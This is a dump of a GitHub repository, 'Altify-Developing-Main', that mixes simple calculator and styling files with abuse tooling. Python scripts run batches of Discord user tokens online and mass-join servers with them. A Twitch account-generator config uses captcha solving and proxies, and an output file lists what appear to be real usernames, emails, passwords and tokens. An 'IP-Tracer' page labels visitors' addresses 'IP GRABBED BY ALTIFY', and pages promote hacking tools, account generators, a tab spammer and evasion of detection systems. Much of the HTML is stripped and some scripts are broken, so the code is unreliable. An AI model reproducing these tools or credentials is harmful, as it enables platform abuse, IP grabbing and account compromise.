https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PHP/cpanel-email-generator-master.zip -------------------------------------------------------------------------------- /Tools/PHP/csvGenerator4ScratchAccount-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PHP/csvGenerator4ScratchAccount-master.zip -------------------------------------------------------------------------------- /Tools/PHP/twitter-account-generator-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PHP/twitter-account-generator-master.zip -------------------------------------------------------------------------------- /Tools/PyChecker/online.py: -------------------------------------------------------------------------------- 1 | import json 2 | import random 3 | import sys 4 | import re 5 | import threading 6 | import time 7 | import os 8 | from concurrent.futures import ThreadPoolExecutor 9 | import websocket 10 | from colorama import Fore 11 | from colorama import init, Fore, Back, Style 12 | 13 | init(convert=True) 14 | 15 | def online(token, game, type, status): 16 | ws = websocket.WebSocket() 17 | if status == "random": 18 | stat = ['online', 'dnd', 'idle'] 19 | status = random.choice(stat) 20 | ws.connect('wss://gateway.discord.gg/?v=6&encoding=json') 21 | hello = json.loads(ws.recv()) 22 | heartbeat_interval = hello['d']['heartbeat_interval'] 23 | if type == "Playing": 24 | gamejson = { 25 | "name": game, 26 | "type": 0 27 | } 28 | elif type == 'Streaming': 29 | gamejson = { 30 | "name": game, 31 | "type": 1, 32 | "url": "https://www.twitch.tv/discord.gg/AVKEJtWkBj" 33 | } 34 | elif type == "Listening": 35 | gamejson = { 36 | "name": game, 37 | "type": 2 38 | } 39 | elif type == "Watching": 40 | gamejson = { 41 | "name": game, 42 | "type": 3 43 | } 44 | auth = { 45 | "op": 2, 46 | "d": { 47 | "token": token, 48 | "properties": { 49 | "$os": sys.platform, 50 | "$browser": "RTB", 51 | "$device": f"{sys.platform} Device" 52 | }, 53 | "presence": { 54 | "game": gamejson, 55 | "status": status, 56 | "since": 0, 57 | "afk": False 58 | } 59 | }, 60 | "s": None, 61 | "t": None 62 | } 63 | ws.send(json.dumps(auth)) 64 | ack = { 65 | "op": 1, 66 | "d": None 67 | } 68 | while True: 69 | time.sleep(heartbeat_interval / 1000) 70 | try: 71 | ws.send(json.dumps(ack)) 72 | except Exception as e: 73 | break 74 | 75 | 76 | def main(): 77 | types = ['Playing', 'Streaming', 'Watching', 'Listening'] 78 | type = input(f''' 79 | 80 | ██████╗ ██████╗ ██████╗██╗ ██╗ 81 | ██╔════╝██╔═══██╗██╔════╝██║ ██╔╝ 82 | ██║ ██║ ██║██║ █████╔╝ 83 | ██║ ██║ ██║██║ ██╔═██╗ 84 | ╚██████╗╚██████╔╝╚██████╗██║ ██╗ 85 | ╚═════╝ ╚═════╝ ╚═════╝╚═╝ ╚═╝ 86 | 87 | 88 | 89 | Options: Playing | Streaming | Watching | Listening 90 | 91 | Your Choice > ''') 92 | os.system("cls") 93 | game = input(f''' 94 | 95 | ██████╗ ██████╗ ██████╗██╗ ██╗ 96 | ██╔════╝██╔═══██╗██╔════╝██║ ██╔╝ 97 | ██║ ██║ ██║██║ █████╔╝ 98 | ██║ ██║ ██║██║ ██╔═██╗ 99 | ╚██████╗╚██████╔╝╚██████╗██║ ██╗ 100 | ╚═════╝ ╚═════╝ ╚═════╝╚═╝ ╚═╝ 101 | 102 | 103 | 104 | Info: Type what you want the status to be 105 | 106 | Status > ''') 107 | status = ['online', 'dnd', 'idle','random'] 108 | status = status[3] 109 | executor = ThreadPoolExecutor(max_workers=1000) 110 | for token in open("tokens.txt","r+").readlines(): 111 | threading.Thread(target=lambda : online(token.replace("\n",""), game, type, status)).start() 112 | os.system("cls") 113 | print(f"{Fore.LIGHTRED_EX}[{Fore.RESET}!{Fore.LIGHTRED_EX}]{Fore.RESET} Tokens Online") 114 | 115 | main() 116 | -------------------------------------------------------------------------------- /Tools/PyChecker/static (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PyChecker/static (7).png -------------------------------------------------------------------------------- /Tools/PyChecker/static (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/PyChecker/static (8).png -------------------------------------------------------------------------------- /Tools/PyChecker/tokens.txt: -------------------------------------------------------------------------------- 1 | token 2 | -------------------------------------------------------------------------------- /Tools/PyTokenJoiner/joiner.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | link = input('Discord Invite Link: ') 4 | if len(link) > 6: 5 | link = link[19:] 6 | apilink = "https://discordapp.com/api/v6/invite/" + str(link) 7 | 8 | print (link) 9 | 10 | with open('tokens.txt','r') as handle: 11 | tokens = handle.readlines() 12 | for x in tokens: 13 | token = x.rstrip() 14 | headers={ 15 | 'Authorization': token 16 | } 17 | requests.post(apilink, headers=headers) 18 | print ("All valid tokens have joined!") 19 | -------------------------------------------------------------------------------- /Tools/PyTokenJoiner/tokens.txt: -------------------------------------------------------------------------------- 1 | token 2 | -------------------------------------------------------------------------------- /Tools/TwitchAccGen/TwitchAccountCreator-main.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/Tools/TwitchAccGen/TwitchAccountCreator-main.zip -------------------------------------------------------------------------------- /Tools/TwitchAccGen/config/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "2capthcaKey": "yourCaptchaKey", 3 | "threading": 50, 4 | "Number_of_accounts_to_be_created": 10, 5 | "sleepdelay": 3, 6 | "timeout": 1500, 7 | "useProxy": true, 8 | "proxyType": "http|http/https|socsk5", 9 | "deleteUsedProxy": false 10 | } 11 | -------------------------------------------------------------------------------- /Tools/TwitchAccGen/out/tokenInfo.txt: -------------------------------------------------------------------------------- 1 | ManyaHbGL:j.o.s.ero.dr.ique.ztm.p@gmail.com:Ut7^0j.L&iQ?i>R:zqikdfqnddb9hm0yviezmgzpntryfk 2 | ShariaHWkd:joser.od.r.i.quez.tmp@gmail.com:]3P6OTfj:bqzb11yk44qtis56c3265owu2xd607 3 | -------------------------------------------------------------------------------- /Tools/TwitchAccGen/out/tokens.txt: -------------------------------------------------------------------------------- 1 | zqikdfqnddb9hm0yviezmgzpntryfk 2 | bqzb11yk44qtis56c3265owu2xd607 3 | -------------------------------------------------------------------------------- /Tools/TwitchAccGen/requirements.txt: -------------------------------------------------------------------------------- 1 | 2captcha-python 2 | requests -------------------------------------------------------------------------------- /cleb/csrf.src.html: -------------------------------------------------------------------------------- 1 | 2 | Altify IP-Tracer 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

14 | 22 | 23 | 53 | 54 | 64 | 70 | 71 | 78 | 79 | 85 | 86 | 93 |

CloudFlare

94 |

95 |

IP GRABBED BY ALTIFY

96 |

GeoIpLookUp

97 |

98 |

IP GRABBED BY ALTIFY

99 |

IpData

100 |

101 |

IP GRABBED BY ALTIFY

102 |

DB-IP

103 |

104 |

IP GRABBED BY ALTIFY

105 |

BigDataCloud

106 |

107 | -------------------------------------------------------------------------------- /css/style.css: -------------------------------------------------------------------------------- 1 | @import url('https://fonts.googleapis.com/css?family=Poppins:400,500,700'); 2 | 3 | html, body { 4 | height: 100% ; 5 | width: 100%; 6 | font-family: 'Roboto', sans-serif; 7 | color: #222; 8 | } 9 | #nav-bar { 10 | top: 0; 11 | position: sticky; 12 | z-index: 10; 13 | } 14 | .navbar { 15 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 16 | padding: 0 !important; 17 | } 18 | .navbar-brand img { 19 | height: 40px; 20 | padding-left: 20px; 21 | } 22 | .navbar-brand li { 23 | padding: 0 10px; 24 | margin-right: 20px; 25 | } 26 | .navbar-nav li a { 27 | color: #fff !important; 28 | font-weight: 600; 29 | text-align: center; 30 | } 31 | .navbar-toggler { 32 | outline: none !important; 33 | } 34 | /* Banner section */ 35 | #banner { 36 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 37 | color: #fff; 38 | padding-top: 5%; 39 | } 40 | .promo-title { 41 | font-size: 40px; 42 | font-weight: 600; 43 | margin-top: 75px; 44 | } 45 | .fa-play{ 46 | width: 60px; 47 | } 48 | #banner a { 49 | color: #fff; 50 | text-decoration: none; 51 | } 52 | /* services */ 53 | 54 | #services { 55 | padding: 80px 0; 56 | } 57 | .service-img { 58 | width: 200px; 59 | margin-top: 20px; 60 | } 61 | .services { 62 | padding: 20px; 63 | } 64 | .services h4 { 65 | text-transform: uppercase; 66 | margin-top: 25px; 67 | padding: 5px; 68 | } 69 | /* line above what we do */ 70 | .title::before { 71 | content: ''; 72 | background: #7b1798; 73 | height: 5px; 74 | width: 200px; 75 | margin-left: auto; 76 | margin-right: auto; 77 | display: block; 78 | transform: translateY(63px); 79 | } 80 | /* overlaps the first line */ 81 | .title::after { 82 | content: ''; 83 | background: #7b1798; 84 | height: 10px; 85 | width: 50px; 86 | margin-left: auto; 87 | margin-right: auto; 88 | margin-bottom: 40px; 89 | display: block; 90 | transform: translateY(8px); 91 | } 92 | #services .btn-primary { 93 | box-shadow: none; 94 | padding: 8px 25px; 95 | border: none; 96 | border-radius: 20px; 97 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 98 | transform: translateX(520px) 99 | } 100 | 101 | /* about us section */ 102 | 103 | #about-us { 104 | background: #f8f9fa; 105 | padding-bottom: 50px; 106 | padding-top: 50px; 107 | } 108 | .about-title { 109 | font-size: 40px; 110 | font-weight: 600; 111 | margin-top: 8%; 112 | } 113 | #about-us ul li { 114 | margin: 10px 0; 115 | } 116 | #about-us ul { 117 | margin-left: 20px; 118 | } 119 | 120 | /* testimonials section */ 121 | #testimonials { 122 | background: #f8f9fa; 123 | padding-bottom: 50px; 124 | padding-top: 50px; 125 | } 126 | .testimonials { 127 | border-left: 4px solid #7b1798; 128 | margin-top: 50px; 129 | margin-bottom: 50px ; 130 | } 131 | .testimonials img { 132 | height: 100px; 133 | width: 100px; 134 | border-radius: 50%; 135 | margin: 0 10px ; 136 | } 137 | .user-details { 138 | display: inline-block; 139 | font-size: 18px; 140 | } 141 | 142 | /* social media */ 143 | #social-media { 144 | background: #f8f9fa; 145 | padding: 100px 0; 146 | } 147 | .social a { 148 | padding: 3rem; 149 | font-size: 4.5rem; 150 | } 151 | .fa-facebook { 152 | color: #3b5998; 153 | } 154 | .fa-twitter { 155 | color: #00aced; 156 | } 157 | .fa-google-plus-g{ 158 | color: #dd4b39; 159 | } 160 | .fa-instagram { 161 | color: #517fa4; 162 | } 163 | .fa-linkedin { 164 | color: #5381e2; 165 | } 166 | .fa-facebook:hover, 167 | .fa-twitter:hover, 168 | .fa-google-plus-g:hover, 169 | .fa-instagram:hover, 170 | .fa-linkedin:hover { 171 | color: #d5d5d5; 172 | transform: translateY(-10px); 173 | } 174 | 175 | /* footer */ 176 | 177 | #footer { 178 | color: #fff; 179 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 180 | color: #d5d5d5; 181 | } 182 | .footer-box { 183 | padding: 20px; 184 | } 185 | .footer-box img { 186 | width: 120px; 187 | margin-bottom: 20px; 188 | } 189 | .footer-box .form-control { 190 | box-shadow: none; 191 | border: none; 192 | border-radius: 0; 193 | margin-top: 25px; 194 | max-width: 250px; 195 | } 196 | .footer-box .btn-primary { 197 | box-shadow: none; 198 | border-radius: 25px; 199 | margin-top: 30px; 200 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 201 | } 202 | hr { 203 | background-color: #fff; 204 | } 205 | #myBtn { 206 | transform: translateX(1050px); 207 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 208 | border-radius: 40px; 209 | box-shadow: none; 210 | } 211 | 212 | /*---Media Queries --*/ 213 | @media (max-width: 992px) { 214 | #myBtn { 215 | transform: translateX(400px); 216 | } 217 | #services .btn-primary { 218 | transform: translateX(300px); 219 | } 220 | } 221 | @media (max-width: 768px) { 222 | #myBtn { 223 | transform: translateX(300px); 224 | } 225 | #services .btn-primary { 226 | transform: translateX(300px); 227 | } 228 | #banner .img-fluid { 229 | margin-bottom: .2rem !important; 230 | } 231 | } 232 | @media (max-width: 576px) { 233 | #myBtn { 234 | transform: translateX(160px); 235 | } 236 | #services .btn-primary { 237 | transform: translateX(160px); 238 | } 239 | #banner .img-fluid { 240 | margin-bottom: .2rem !important; 241 | } 242 | } 243 | @media (max-width: 375px) { 244 | #myBtn { 245 | transform: translateX(100px); 246 | } 247 | #services .btn-primary { 248 | transform: translateX(100px); 249 | } 250 | } 251 | -------------------------------------------------------------------------------- /css/style2.css: -------------------------------------------------------------------------------- 1 | @import url('https://fonts.googleapis.com/css?family=Comic%20Sans%20MS'); 2 | 3 | html, pCSMS { 4 | height: 100% ; 5 | width: 100%; 6 | font-family: "Comic Sans MS", "Comic Sans", cursive; 7 | color: #222; 8 | } 9 | -------------------------------------------------------------------------------- /css/style3.css: -------------------------------------------------------------------------------- 1 | .btn1 { 2 | box-shadow: none; 3 | border-radius: 25px; 4 | background-image: linear-gradient(to right, #ba1771, #7a124b,#5f1782); 5 | } 6 | -------------------------------------------------------------------------------- /css/style4.css: -------------------------------------------------------------------------------- 1 | .center { 2 | margin: auto; 3 | width: 50%; 4 | border: 4px solid rgb(189, 112, 203); 5 | padding: 10px; 6 | } 7 | -------------------------------------------------------------------------------- /css/style5.css: -------------------------------------------------------------------------------- 1 | .btn-latest .latestbutton { 2 | display: inline-block; 3 | padding: 15px 25px; 4 | font-size: 24px; 5 | cursor: pointer; 6 | text-align: center; 7 | text-decoration: none; 8 | outline: none; 9 | color: #fff; 10 | background-color: #aa57d4; 11 | border: none; 12 | border-radius: 15px; 13 | box-shadow: 0 9px #999; 14 | display: block; 15 | } 16 | 17 | .latestbutton:hover { 18 | background-color: #7f0fb8; 19 | opacity: .75; 20 | } 21 | 22 | .latestbutton:active { 23 | background-color: #7f0fb8; 24 | box-shadow: 0 5px #666; 25 | transform: translateY(4px); 26 | } 27 | .btn-latest-row .rowbutton { 28 | display: inline-block; 29 | padding: 15px 25px; 30 | font-size: 24px; 31 | cursor: pointer; 32 | text-align: center; 33 | text-decoration: none; 34 | outline: none; 35 | color: #fff; 36 | background-color: #aa57d4; 37 | border: none; 38 | border-radius: 15px; 39 | box-shadow: 0 9px #999; 40 | display: block; 41 | } 42 | 43 | .rowbutton:hover { 44 | background-color: #7f0fb8; 45 | opacity: .75; 46 | } 47 | 48 | .rowbutton:active { 49 | background-color: #7f0fb8; 50 | box-shadow: 0 5px #666; 51 | transform: translateY(4px); 52 | } 53 | -------------------------------------------------------------------------------- /favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/favicon.ico -------------------------------------------------------------------------------- /googlec1598d5019954416.html: -------------------------------------------------------------------------------- 1 | google-site-verification: googlec1598d5019954416.html -------------------------------------------------------------------------------- /html/AJAX/AutoRef.js: -------------------------------------------------------------------------------- 1 | SetTimeout(Refrsh, 3000); 2 | function Refrsh() { 3 | location.reload(); 4 | }; 5 | -------------------------------------------------------------------------------- /html/AJAX/AutoUpdate.html: -------------------------------------------------------------------------------- 1 |
2 |

Randomized IP Gen Online

3 | 4 |
5 | 15 | -------------------------------------------------------------------------------- /html/AJAX/S4_loader.js: -------------------------------------------------------------------------------- 1 | const xhttp = new XMLHttpRequest(); 2 | xhttp.onload = function() { 3 | document.getElementById("S4-List").innerHTML = this.responseText; 4 | } 5 | xhttp.open("GET", "SOCKS4.html", true); 6 | xhttp.send(); 7 | -------------------------------------------------------------------------------- /html/AJAX/S5_loader.js: -------------------------------------------------------------------------------- 1 | const xhttp = new XMLHttpRequest(); 2 | xhttp.onload = function() { 3 | document.getElementById("S5-List").innerHTML = this.responseText; 4 | } 5 | xhttp.open("GET", "SOCKS5.html", true); 6 | xhttp.send(); 7 | -------------------------------------------------------------------------------- /html/AJAX/counter.js: -------------------------------------------------------------------------------- 1 | var counterContainer = document.querySelector(".website-counter"); 2 | var visitCount = localStorage.getItem("page_view"); 3 | // Check if page_view entry is present 4 | if (visitCount) { 5 | visitCount = Number(visitCount) + 1; 6 | localStorage.setItem("page_view", visitCount); 7 | const rndInt = Math.floor(Math.random() * 10) + 1 8 | document.cookie = 'VisitorCount='+visitCount+'; expires=Wed, 1 Jan 2070 13:47:11 UTC; path=/'; 9 | } else { 10 | visitCount = 1; 11 | localStorage.setItem("page_view", 1); 12 | } 13 | counterContainer.innerHTML = visitCount; 14 | let visitorCount = (visitCount + 1); 15 | SetTimeout(checkCookie, 200) 16 | function checkCookie() { 17 | reloaded = Number(reloaded) + 1; 18 | let reloaded = getCookie("IsRefreshed?"); 19 | if (reloaded != "2") { 20 | delete reloaded; 21 | document.cookie="IsRefreshed?=;expires=Thu, 01 Jan 1970 22 | window.location.replace("https://altify-developing-001.netlify.app/html/ajax/info?visitor-count="+visitorCount); 23 | } else { 24 | if (reloaded != "1") { 25 | document.cookie = 'IsRefreshed?='+reloaded+'; expires=Wed, 1 Jan 2070 13:47:11 UTC; path=/'; 26 | setCookie("IsRefreshed?", reloaded, 2); 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /html/AJAX/http_loader.js: -------------------------------------------------------------------------------- 1 | const xhttp = new XMLHttpRequest(); 2 | xhttp.onload = function() { 3 | document.getElementById("HTTP-List").innerHTML = this.responseText; 4 | } 5 | xhttp.open("GET", "HTTP.html", true); 6 | xhttp.send(); 7 | -------------------------------------------------------------------------------- /html/AJAX/img/AltifyPrxGen.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/AJAX/img/AltifyPrxGen.gif -------------------------------------------------------------------------------- /html/AJAX/img/cybernews.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/AJAX/img/cybernews.png -------------------------------------------------------------------------------- /html/AJAX/img/haveibeenpwned.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/AJAX/img/haveibeenpwned.png -------------------------------------------------------------------------------- /html/AJAX/img/refresh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/AJAX/img/refresh.png -------------------------------------------------------------------------------- /html/AJAX/info.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Altify | Proxy Generator 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
Website visitor count:

19 | 20 | 21 | 22 | 23 | 24 |

This Site Has Been Refined To Be Und Et eCted by hundreds of anti-bapass det ec tion systems

25 |

Pro

x

ies:


26 | 27 |

28 | 29 | 30 |
31 |

Combo Form

32 |

HTTP

33 |
34 |
35 |

Socks4

36 |
37 | 38 |
39 |

Socks5

40 |
41 | 42 |
43 | 44 |

https://www.securly.com/blocked?useremail=blocked@securly.net&reason=shit
is the one blocker that can block this site

45 |

Check Out My Other Sites: 46 |
47 | AutoAdvertisment ( I Add ur site for no payment, and it auto updates ) 48 | Site 49 |

50 | 51 |
52 | Pure Javascript Calcualator ( Hosted by html ) 53 | Site 54 |

55 | 56 |
57 | Auto Bibliography Formatting ( Formatting Tool ) 58 | Site 59 |

60 | 61 |
62 | Hacking Tools ( ONLY C# ) 63 | Site 64 |

65 | Hacking Tools ( ONLY JS ) 66 | Site 67 |

68 | Hacking Tools ( ONLY Java ) 69 | Site 70 |

71 | Hacking Tools ( ONLY PHP ) 72 | Site 73 |

74 | Hacking Tools ( ONLY Python ) 75 | Site 76 |

77 |
78 |

79 |

80 |
81 |
82 |
83 |
84 |
85 |
86 |

Sponsored:

87 | 88 | HaveIBeenPwned 89 | 90 | 91 | CyberNews 92 | 93 |
94 |

https://haveibeenpwned.com/?ref=Altify

95 |

https://cybernews.com/personal-data-leak-check/?ref=Altify

96 | 97 | 98 | -------------------------------------------------------------------------------- /html/AJAX/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: black; 3 | } 4 | 5 | h1 { 6 | color: green; 7 | font-family: verdana; 8 | font-size: 8px; 9 | } 10 | 11 | .center { 12 | display: block; 13 | margin-left: auto; 14 | margin-right: auto; 15 | width: 50%; 16 | } 17 | 18 | h2 { 19 | color: darkgreen; 20 | text-align: center; 21 | } 22 | 23 | h7 { 24 | color: darkgreen; 25 | text-align: left; 26 | } 27 | 28 | p { 29 | color: green; 30 | font-family: verdana; 31 | font-size: 14px; 32 | text-align: center; 33 | } 34 | 35 | 36 | box { 37 | font-size: 18px; 38 | margin-top: 100px; 39 | margin-bottom: 100px; 40 | margin-right: 100px; 41 | margin-left: 525px; 42 | width: 320px; 43 | padding: 10px; 44 | border: 5px solid green; 45 | } 46 | 47 | .flex-container { 48 | display: flex; 49 | background-color: grey; 50 | } 51 | 52 | .flex-container > box2 { 53 | background-color: lightgrey; 54 | color: darkgreen; 55 | margin-top: 100px; 56 | margin-bottom: 100px; 57 | margin-right: 100px; 58 | margin-left: 525px; 59 | padding: 20px; 60 | font-size: 30px; 61 | text-align: center; 62 | } 63 | 64 | div { 65 | font-size: 18px; 66 | color: green; 67 | text-align: center; 68 | font-family: Open+Sans; 69 | } 70 | 71 | revad { 72 | margin: auto; 73 | font-size: 18px; 74 | color: lightgreen; 75 | text-align: center; 76 | font-family: Open+Sans; 77 | } 78 | 79 | http { 80 | color: darkgreen; 81 | text-align: center; 82 | } 83 | 84 | 85 | s4 { 86 | color: darkgreen; 87 | text-align: left; 88 | } 89 | 90 | 91 | s5 { 92 | color: darkgreen; 93 | text-align: right; 94 | } 95 | -------------------------------------------------------------------------------- /html/AJAX/visitorcountautoupdate.html: -------------------------------------------------------------------------------- 1 |
2 |

Randomized IP Gen Online

3 | 4 |

5 |
6 | 11 | 22 | -------------------------------------------------------------------------------- /html/AJAX/vs.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 21 | -------------------------------------------------------------------------------- /html/Bibliography-Formatting-Tool.html: -------------------------------------------------------------------------------- 1 | 2 |

Run in:

3 | w3schools online tool 4 | 5 |
6 |          7 |          8 |         
9 |          10 |          11 |         
12 |              13 |              14 |             
15 |          16 |          17 |         
18 |          19 |          20 |         
21 |          22 |          23 |         
24 |          25 |          26 |         
27 |

the "/" is a illegal input so dont use it

28 | 29 |
30 | Example Output: 31 |

32 | fname=John&lname=Doe&otitle=What We Do&fwebname=Altify Marketing&lwebname=Altify-Developing&odate=16 Mar. 2022&osite=altify-developing-001.netlify.app 33 |

34 | -------------------------------------------------------------------------------- /html/Bibliography-Formatting-Tool/POST.html: -------------------------------------------------------------------------------- 1 |

teat teat


2 |

u posted maybe

3 | -------------------------------------------------------------------------------- /html/DownloadFile.js: -------------------------------------------------------------------------------- 1 | function download(fileUrl, fileName) { 2 | var a = document.createElement("a"); 3 | a.href = fileUrl; 4 | a.setAttribute("download", fileName); 5 | a.click(); 6 | } 7 | -------------------------------------------------------------------------------- /html/JavaScriptToolsOnly.html: -------------------------------------------------------------------------------- 1 | 2 |

3 | JavaScript 4 |

5 | 6 |

7 | 10 | 11 | 26 |

27 | 28 |

29 | Discord Account Gen Bot 30 |

31 | 32 | Part 1 33 | 39 | 40 | 41 | 42 | 43 |

44 | Discord Account Gen Bot #2 45 |

46 | 47 | Part 1 48 | 54 | 55 | 56 |

57 | Tab Spammer 58 |

59 | 60 | Part 1dont left click or scan 61 | 62 |

63 | this is the link you need to copy, this is the spammer, and the button for it also works as a qr code to go to the exact same link 64 |

65 | -------------------------------------------------------------------------------- /html/JavaToolsOnly.html: -------------------------------------------------------------------------------- 1 | 2 |

3 | Java 4 |

5 | 6 |

7 | 10 | 11 | 27 |

28 | 29 |

30 | Instagram Account Generator 31 |

32 | 33 | Part 1 34 | 40 | 41 | 42 | 43 | 44 |

45 | RuneScape Account Generator 46 |

47 | 48 | Part 1 49 | 55 | 56 | 57 | 58 | 59 |

60 | steam gen 61 |

62 | 63 | Part 1 64 | 70 | 71 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/PR.TrigCalc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/NEW_TOOLS/TRIG_CALC/PR.TrigCalc.gif -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/YT.Calc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/NEW_TOOLS/TRIG_CALC/YT.Calc.gif -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/calculator.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Altify | youtube money calculator 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 30 | 31 |

Trig Calculator

Created By: Altify Developing

32 | 33 |
34 | 35 |
36 | 37 |
38 | 39 |
40 | 41 |
42 | 43 | 50 | Send
51 | Examples
52 | 63 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/detailed.html: -------------------------------------------------------------------------------- 1 |


if 1 is your conjugator in this case m in the url, is equal to 1, you will get the following for req views to recieve payment: 130.71895424836603
the best thing to do in these positions is to recognize the fact that these are not whole numbers and to mentally only consider the whole number by rounding up, and also this is the general payment you recieve, not taking into mind the fact that this is also the average payment per view you would get if your channel didn't fit any category specifically, as youtube does not pay you for skipped ads, and they only pay you on a vbr (viewership based rate), the default 30% of youtube ads are skipped, that is the general amount for gaming, tutorials, and other shorter, younger crowds, the more likley to recieve less money, for a gaming video the skip rate is 87%, for a tutorial it is 94%. This data was measured by a annual youtube census in 2022, which many people did not participate in, which also makes it much more likely that you will not recieve as much money, so take the number you recieve with a grain of salt, and try to at least double it.

2 | 3 | 4 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/examples.html: -------------------------------------------------------------------------------- 1 |

views: 52287.58169934641 = $400
views: 130.71895424836602 = $1
130.71895424836602 --> 1307.1895424836602 = $10
and so on ^^

2 | Explanation 3 | 4 | 5 |
6 |

Other Examples:

7 |

1$ in yt under other section ( generalized )

8 | 9 |

open source project, 100% free, no need to support me in any way, this is a hobby i make my vast sums of money from other things, then i am forced to get half of it to the irs

10 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/TRIG_CALC/js/_1.js: -------------------------------------------------------------------------------- 1 | function (go1) { 2 | window.location.href('https://altify-developing-001.netlify.app/html/new_tools/trig_calc/getresults?v=130.71895424836602&type=0.00765'); 3 | }; 4 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/calculators/heat_flow/calculate.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Altify | Heat Flow Calculator 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 31 | 32 |

Heat Flow Calculator

Created By: Altify Developing

33 | 34 |

35 | 36 |
37 | 51 | 52 |
53 | 54 |
55 | Send
56 | 57 | 66 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/calculators/heat_flow/update.js: -------------------------------------------------------------------------------- 1 | document.getElementById("showmore").addEventListener("click", function() { 2 | document.getElementById("showmore1").innerHTML = "Mass is measured in grams, Specific heat and change in temperature is measured as Celsius, and change in tempearture should be calculated as initial avg - final avg"; 3 | }) 4 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/calculators/money/calculator.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Altify | USD Money Calculator 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 31 | 32 |

USD Money Calculator

Created By: Altify Developing

33 | 34 |

35 | 36 |
37 | 38 |
39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 |
47 | 48 |
COINS



49 | 50 |
51 | 52 |
53 | 54 |
55 | 56 |
57 | 58 |
59 | 60 |
61 | Send
62 | 63 | 81 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/calculators/money/results.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Altify | USD Money Results 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 27 |

Results:

28 |


29 |

Tool by: Altify

30 | 91 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/calculators/money/update.js: -------------------------------------------------------------------------------- 1 | document.getElementById("showmore").addEventListener("click", function() { 2 | document.getElementById("showmore1").innerHTML = "The money will be calculated as is, coins added after main dollars are added as their proper values do not use commas as it will break the code"; 3 | 4 | }) 5 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/http.html: -------------------------------------------------------------------------------- 1 | 2 |

